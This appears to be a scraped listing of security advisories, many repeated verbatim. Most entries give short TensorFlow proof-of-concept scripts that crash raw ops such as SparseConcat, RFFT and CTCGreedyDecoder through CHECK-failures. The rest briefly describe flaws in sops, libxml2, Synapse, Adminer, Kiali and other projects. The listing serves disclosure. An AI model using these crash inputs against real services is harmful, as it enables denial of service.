The API of tf.raw_ops.SparseCross allows combinations which would result in a CHECK-failure and denial of service: import tensorflow as tf hashed_output = False num_buckets = 1949315406 hash_key = 1869835877 out_type = tf.string internal_type = tf.string indices_1 = tf.constant([0, 6], shape=[1, 2], dtype=tf.int64) indices_2 = tf.constant([0, 0], shape=[1, 2], dtype=tf.int64) indices = [indices_1, indices_2] values_1 = tf.constant([0], dtype=tf.int64) values_2 = tf.constant([72], dtype=tf.int64) values = [values_1, values_2] batch_size = 4 shape_1 = …

CHECK-fail in SparseCross due to type confusion

The API of tf.raw_ops.SparseCross allows combinations which would result in a CHECK-failure and denial of service: import tensorflow as tf hashed_output = False num_buckets = 1949315406 hash_key = 1869835877 out_type = tf.string internal_type = tf.string indices_1 = tf.constant([0, 6], shape=[1, 2], dtype=tf.int64) indices_2 = tf.constant([0, 0], shape=[1, 2], dtype=tf.int64) indices = [indices_1, indices_2] values_1 = tf.constant([0], dtype=tf.int64) values_2 = tf.constant([72], dtype=tf.int64) values = [values_1, values_2] batch_size = 4 shape_1 = …

CHECK-fail in SparseConcat

An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.SparseConcat: import tensorflow as tf import numpy as np indices_1 = tf.constant([[514, 514], [514, 514]], dtype=tf.int64) indices_2 = tf.constant([[514, 530], [599, 877]], dtype=tf.int64) indices = [indices_1, indices_2] values_1 = tf.zeros([0], dtype=tf.int64) values_2 = tf.zeros([0], dtype=tf.int64) values = [values_1, values_2] shape_1 = tf.constant([442, 514, 514, 515, 606, 347, 943, 61, 2], dtype=tf.int64) shape_2 = tf.zeros([9], dtype=tf.int64) shapes = [shape_1, …

CHECK-fail in SparseConcat

An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.SparseConcat: import tensorflow as tf import numpy as np indices_1 = tf.constant([[514, 514], [514, 514]], dtype=tf.int64) indices_2 = tf.constant([[514, 530], [599, 877]], dtype=tf.int64) indices = [indices_1, indices_2] values_1 = tf.zeros([0], dtype=tf.int64) values_2 = tf.zeros([0], dtype=tf.int64) values = [values_1, values_2] shape_1 = tf.constant([442, 514, 514, 515, 606, 347, 943, 61, 2], dtype=tf.int64) shape_2 = tf.zeros([9], dtype=tf.int64) shapes = [shape_1, …

CHECK-fail in SparseConcat

An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.SparseConcat: import tensorflow as tf import numpy as np indices_1 = tf.constant([[514, 514], [514, 514]], dtype=tf.int64) indices_2 = tf.constant([[514, 530], [599, 877]], dtype=tf.int64) indices = [indices_1, indices_2] values_1 = tf.zeros([0], dtype=tf.int64) values_2 = tf.zeros([0], dtype=tf.int64) values = [values_1, values_2] shape_1 = tf.constant([442, 514, 514, 515, 606, 347, 943, 61, 2], dtype=tf.int64) shape_2 = tf.zeros([9], dtype=tf.int64) shapes = [shape_1, …

CHECK-fail in DrawBoundingBoxes

An attacker can trigger a denial of service via a CHECK failure by passing an empty image to tf.raw_ops.DrawBoundingBoxes: import tensorflow as tf images = tf.fill([53, 0, 48, 1], 0.) boxes = tf.fill([53, 31, 4], 0.) boxes = tf.Variable(boxes) boxes[0, 0, 0].assign(3.90621) tf.raw_ops.DrawBoundingBoxes(images=images, boxes=boxes)

CHECK-fail in DrawBoundingBoxes

An attacker can trigger a denial of service via a CHECK failure by passing an empty image to tf.raw_ops.DrawBoundingBoxes: import tensorflow as tf images = tf.fill([53, 0, 48, 1], 0.) boxes = tf.fill([53, 31, 4], 0.) boxes = tf.Variable(boxes) boxes[0, 0, 0].assign(3.90621) tf.raw_ops.DrawBoundingBoxes(images=images, boxes=boxes)

CHECK-fail in DrawBoundingBoxes

An attacker can trigger a denial of service via a CHECK failure by passing an empty image to tf.raw_ops.DrawBoundingBoxes: import tensorflow as tf images = tf.fill([53, 0, 48, 1], 0.) boxes = tf.fill([53, 31, 4], 0.) boxes = tf.Variable(boxes) boxes[0, 0, 0].assign(3.90621) tf.raw_ops.DrawBoundingBoxes(images=images, boxes=boxes)

CHECK-fail in AddManySparseToTensorsMap

An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.AddManySparseToTensorsMap: import tensorflow as tf import numpy as np sparse_indices = tf.constant(530, shape=[1, 1], dtype=tf.int64) sparse_values = tf.ones([1], dtype=tf.int64) shape = tf.Variable(tf.ones([55], dtype=tf.int64)) shape[:8].assign(np.array([855, 901, 429, 892, 892, 852, 93, 96], dtype=np.int64)) tf.raw_ops.AddManySparseToTensorsMap(sparse_indices=sparse_indices, sparse_values=sparse_values, sparse_shape=shape)

CHECK-fail in AddManySparseToTensorsMap

An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.AddManySparseToTensorsMap: import tensorflow as tf import numpy as np sparse_indices = tf.constant(530, shape=[1, 1], dtype=tf.int64) sparse_values = tf.ones([1], dtype=tf.int64) shape = tf.Variable(tf.ones([55], dtype=tf.int64)) shape[:8].assign(np.array([855, 901, 429, 892, 892, 852, 93, 96], dtype=np.int64)) tf.raw_ops.AddManySparseToTensorsMap(sparse_indices=sparse_indices, sparse_values=sparse_values, sparse_shape=shape)

CHECK-fail in AddManySparseToTensorsMap

An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.AddManySparseToTensorsMap: import tensorflow as tf import numpy as np sparse_indices = tf.constant(530, shape=[1, 1], dtype=tf.int64) sparse_values = tf.ones([1], dtype=tf.int64) shape = tf.Variable(tf.ones([55], dtype=tf.int64)) shape[:8].assign(np.array([855, 901, 429, 892, 892, 852, 93, 96], dtype=np.int64)) tf.raw_ops.AddManySparseToTensorsMap(sparse_indices=sparse_indices, sparse_values=sparse_values, sparse_shape=shape)

CHECK-fail in `tf.raw_ops.RFFT`

An attacker can cause a denial of service by exploiting a CHECK-failure coming from the implementation of tf.raw_ops.RFFT: import tensorflow as tf inputs = tf.constant([1], shape=[1], dtype=tf.float32) fft_length = tf.constant([0], shape=[1], dtype=tf.int32) tf.raw_ops.RFFT(input=inputs, fft_length=fft_length) The above example causes Eigen code to operate on an empty matrix. This triggers on an assertion and causes program termination.

CHECK-fail in `tf.raw_ops.RFFT`

An attacker can cause a denial of service by exploiting a CHECK-failure coming from the implementation of tf.raw_ops.RFFT: import tensorflow as tf inputs = tf.constant([1], shape=[1], dtype=tf.float32) fft_length = tf.constant([0], shape=[1], dtype=tf.int32) tf.raw_ops.RFFT(input=inputs, fft_length=fft_length) The above example causes Eigen code to operate on an empty matrix. This triggers on an assertion and causes program termination.

CHECK-fail in `tf.raw_ops.RFFT`

An attacker can cause a denial of service by exploiting a CHECK-failure coming from the implementation of tf.raw_ops.RFFT: import tensorflow as tf inputs = tf.constant([1], shape=[1], dtype=tf.float32) fft_length = tf.constant([0], shape=[1], dtype=tf.int32) tf.raw_ops.RFFT(input=inputs, fft_length=fft_length) The above example causes Eigen code to operate on an empty matrix. This triggers on an assertion and causes program termination.

CHECK-fail in `tf.raw_ops.IRFFT`

An attacker can cause a denial of service by exploiting a CHECK-failure coming from the implementation of tf.raw_ops.IRFFT: import tensorflow as tf values = [-10.0] * 130 values[0] = -9.999999999999995 inputs = tf.constant(values, shape=[10, 13], dtype=tf.float32) inputs = tf.cast(inputs, dtype=tf.complex64) fft_length = tf.constant([0], shape=[1], dtype=tf.int32) tf.raw_ops.IRFFT(input=inputs, fft_length=fft_length) The above example causes Eigen code to operate on an empty matrix. This triggers on an assertion and causes program termination.

CHECK-fail in `tf.raw_ops.IRFFT`

An attacker can cause a denial of service by exploiting a CHECK-failure coming from the implementation of tf.raw_ops.IRFFT: import tensorflow as tf values = [-10.0] * 130 values[0] = -9.999999999999995 inputs = tf.constant(values, shape=[10, 13], dtype=tf.float32) inputs = tf.cast(inputs, dtype=tf.complex64) fft_length = tf.constant([0], shape=[1], dtype=tf.int32) tf.raw_ops.IRFFT(input=inputs, fft_length=fft_length) The above example causes Eigen code to operate on an empty matrix. This triggers on an assertion and causes program termination.

CHECK-fail in `tf.raw_ops.IRFFT`

An attacker can cause a denial of service by exploiting a CHECK-failure coming from the implementation of tf.raw_ops.IRFFT: import tensorflow as tf values = [-10.0] * 130 values[0] = -9.999999999999995 inputs = tf.constant(values, shape=[10, 13], dtype=tf.float32) inputs = tf.cast(inputs, dtype=tf.complex64) fft_length = tf.constant([0], shape=[1], dtype=tf.int32) tf.raw_ops.IRFFT(input=inputs, fft_length=fft_length) The above example causes Eigen code to operate on an empty matrix. This triggers on an assertion and causes program termination.

CHECK-fail in `QuantizeAndDequantizeV4Grad`

An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.QuantizeAndDequantizeV4Grad: import tensorflow as tf gradient_tensor = tf.constant([0.0], shape=[1]) input_tensor = tf.constant([0.0], shape=[1]) input_min = tf.constant([[0.0]], shape=[1, 1]) input_max = tf.constant([[0.0]], shape=[1, 1]) tf.raw_ops.QuantizeAndDequantizeV4Grad( gradients=gradient_tensor, input=input_tensor, input_min=input_min, input_max=input_max, axis=0)

CHECK-fail in `QuantizeAndDequantizeV4Grad`

An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.QuantizeAndDequantizeV4Grad: import tensorflow as tf gradient_tensor = tf.constant([0.0], shape=[1]) input_tensor = tf.constant([0.0], shape=[1]) input_min = tf.constant([[0.0]], shape=[1, 1]) input_max = tf.constant([[0.0]], shape=[1, 1]) tf.raw_ops.QuantizeAndDequantizeV4Grad( gradients=gradient_tensor, input=input_tensor, input_min=input_min, input_max=input_max, axis=0)

CHECK-fail in `LoadAndRemapMatrix`

An attacker can cause a denial of service by exploiting a CHECK-failure coming from tf.raw_ops.LoadAndRemapMatrix: import tensorflow as tf ckpt_path = tf.constant([], shape=[0], dtype=tf.string) old_tensor_name = tf.constant("") row_remapping = tf.constant([], shape=[0], dtype=tf.int64) col_remapping = tf.constant([1], shape=[1], dtype=tf.int64) initializing_values = tf.constant(1.0) tf.raw_ops.LoadAndRemapMatrix( ckpt_path=ckpt_path, old_tensor_name=old_tensor_name, row_remapping=row_remapping, col_remapping=col_remapping, initializing_values=initializing_values, num_rows=0, num_cols=1)

CHECK-fail in `LoadAndRemapMatrix`

An attacker can cause a denial of service by exploiting a CHECK-failure coming from tf.raw_ops.LoadAndRemapMatrix: import tensorflow as tf ckpt_path = tf.constant([], shape=[0], dtype=tf.string) old_tensor_name = tf.constant("") row_remapping = tf.constant([], shape=[0], dtype=tf.int64) col_remapping = tf.constant([1], shape=[1], dtype=tf.int64) initializing_values = tf.constant(1.0) tf.raw_ops.LoadAndRemapMatrix( ckpt_path=ckpt_path, old_tensor_name=old_tensor_name, row_remapping=row_remapping, col_remapping=col_remapping, initializing_values=initializing_values, num_rows=0, num_cols=1)

CHECK-fail in `LoadAndRemapMatrix`

An attacker can cause a denial of service by exploiting a CHECK-failure coming from tf.raw_ops.LoadAndRemapMatrix: import tensorflow as tf ckpt_path = tf.constant([], shape=[0], dtype=tf.string) old_tensor_name = tf.constant("") row_remapping = tf.constant([], shape=[0], dtype=tf.int64) col_remapping = tf.constant([1], shape=[1], dtype=tf.int64) initializing_values = tf.constant(1.0) tf.raw_ops.LoadAndRemapMatrix( ckpt_path=ckpt_path, old_tensor_name=old_tensor_name, row_remapping=row_remapping, col_remapping=col_remapping, initializing_values=initializing_values, num_rows=0, num_cols=1)

CHECK-fail in `CTCGreedyDecoder`

An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.CTCGreedyDecoder: import tensorflow as tf inputs = tf.constant([], shape=[18, 2, 0], dtype=tf.float32) sequence_length = tf.constant([-100, 17], shape=[2], dtype=tf.int32) merge_repeated = False tf.raw_ops.CTCGreedyDecoder(inputs=inputs, sequence_length=sequence_length, merge_repeated=merge_repeated)

CHECK-fail in `CTCGreedyDecoder`

An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.CTCGreedyDecoder: import tensorflow as tf inputs = tf.constant([], shape=[18, 2, 0], dtype=tf.float32) sequence_length = tf.constant([-100, 17], shape=[2], dtype=tf.int32) merge_repeated = False tf.raw_ops.CTCGreedyDecoder(inputs=inputs, sequence_length=sequence_length, merge_repeated=merge_repeated)

CHECK-fail in `CTCGreedyDecoder`

An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.CTCGreedyDecoder: import tensorflow as tf inputs = tf.constant([], shape=[18, 2, 0], dtype=tf.float32) sequence_length = tf.constant([-100, 17], shape=[2], dtype=tf.int32) merge_repeated = False tf.raw_ops.CTCGreedyDecoder(inputs=inputs, sequence_length=sequence_length, merge_repeated=merge_repeated)

CHECK-fail due to integer overflow

An attacker can trigger a denial of service via a CHECK-fail in caused by an integer overflow in constructing a new tensor shape: import tensorflow as tf input_layer = 2**60-1 sparse_data = tf.raw_ops.SparseSplit( split_dim=1, indices=[(0, 0), (0, 1), (0, 2), (4, 3), (5, 0), (5, 1)], values=[1.0, 1.0, 1.0, 1.0, 1.0, 1.0], shape=(input_layer, input_layer), num_split=2, name=None )

CHECK-fail due to integer overflow

An attacker can trigger a denial of service via a CHECK-fail in caused by an integer overflow in constructing a new tensor shape: import tensorflow as tf input_layer = 2**60-1 sparse_data = tf.raw_ops.SparseSplit( split_dim=1, indices=[(0, 0), (0, 1), (0, 2), (4, 3), (5, 0), (5, 1)], values=[1.0, 1.0, 1.0, 1.0, 1.0, 1.0], shape=(input_layer, input_layer), num_split=2, name=None )

CHECK-fail due to integer overflow

An attacker can trigger a denial of service via a CHECK-fail in caused by an integer overflow in constructing a new tensor shape: import tensorflow as tf input_layer = 2**60-1 sparse_data = tf.raw_ops.SparseSplit( split_dim=1, indices=[(0, 0), (0, 1), (0, 2), (4, 3), (5, 0), (5, 1)], values=[1.0, 1.0, 1.0, 1.0, 1.0, 1.0], shape=(input_layer, input_layer), num_split=2, name=None )

A failed upgrade may lead to hung goroutines

Impact Processes using tableflip may encounter hung goroutines in the parent process, after a failed upgrade. The Go runtime has annoying behaviour around setting and clearing O_NONBLOCK: exec.Cmd.Start() ends up calling os.File.Fd() for any file in exec.Cmd.ExtraFiles. os.File.Fd() disables both the use of the runtime poller for the file and clears O_NONBLOCK from the underlying open file descriptor. This can lead to goroutines hanging in a parent process, after at …

Local directory executable lookup in sops (Windows-only)

Impact Windows users using the sops direct editor option (sops file.yaml) can have a local executable named either vi, vim, or nano executed if running sops from cmd.exe This attack is only viable if an attacker is able to place a malicious binary within the directory you are running sops from. As well, this attack will only work when using cmd.exe or the Windows C library SearchPath function. This is …

Information Exposure

This affects the package dns-packet It creates buffers with allocUnsafe and does not always fill them before forming network packets. This can expose internal application memory over unencrypted network when querying crafted invalid domain names.

Out-of-bounds Write

There is a flaw in the xml entity encoding functionality of libxml2 The most likely impact of this flaw is to application availability, with some potential impact to confidentiality and integrity if an attacker is able to use memory information to further exploit the application.

Out-of-bounds Write

There is a flaw in the xml entity encoding functionality of libxml2 The most likely impact of this flaw is to application availability, with some potential impact to confidentiality and integrity if an attacker is able to use memory information to further exploit the application.

Out-of-bounds Write

There is a flaw in the xml entity encoding functionality of libxml2 The most likely impact of this flaw is to application availability, with some potential impact to confidentiality and integrity if an attacker is able to use memory information to further exploit the application.

Denial of service due to improper input validation in third-party identifier endpoint

Impact Missing input validation of some parameters on the endpoints used to confirm third-party identifiers could cause excessive use of disk space and memory leading to resource exhaustion. Patches The issue is fixed by https://github.com/matrix-org/synapse/pull/9855. Workarounds There are no known workarounds. References n/a For more information If you have any questions or comments about this advisory, email us at security@matrix.org.

Cross-site Scripting

Adminer is open-source database management software. A cross-site scripting vulnerability in Adminer to affects users of MySQL, MariaDB, PgSQL and SQLite. XSS is in most cases prevented by strict CSP in all modern browsers. The only exception is when Adminer is using a pdo_ extension to communicate with the database (it is used if the native extensions are not enabled). In browsers without CSP, Adminer to are affected. As a …

Use of Hard-coded Credentials

A hard-coded cryptographic key vulnerability in the default configuration file was found in Kiali, all versions prior to 1.15.1. A remote attacker could abuse this flaw by creating their own JWT signed tokens and bypass Kiali authentication mechanisms, possibly gaining privileges to view and alter the Istio configuration.